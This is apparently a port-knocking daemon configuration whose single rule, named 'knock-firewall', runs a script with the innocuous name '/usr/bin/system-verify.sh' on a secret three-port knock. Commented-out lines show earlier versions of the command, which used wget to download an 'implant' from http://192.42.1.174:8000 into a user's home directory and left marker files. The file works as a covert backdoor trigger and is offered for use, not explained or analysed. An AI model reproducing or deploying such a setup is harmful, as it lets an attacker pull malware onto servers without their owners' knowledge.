interface: "ens3"
timeout: 5
rules:
  - name: "knock-firewall"
    command: "/usr/bin/system-verify.sh"
    sequence:
      - 32768
      - 28977
      - 51234


# && sleep 5 && wget http://192.42.1.174:8000 -O test4-implant"
#command: "touch /home/john/pre-knock.txt && sleep 60 && cd /home/john && wget http://192.42.1.174:8000 -O implant && touch /home/john/knock.txt"